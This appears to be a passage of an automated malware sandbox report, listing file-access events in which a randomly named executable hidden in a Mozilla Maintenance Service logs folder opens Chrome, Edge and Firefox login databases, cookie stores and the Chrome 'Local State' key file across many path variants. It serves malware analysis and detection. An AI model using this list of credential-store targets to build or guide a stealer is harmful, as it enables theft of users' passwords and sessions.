                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
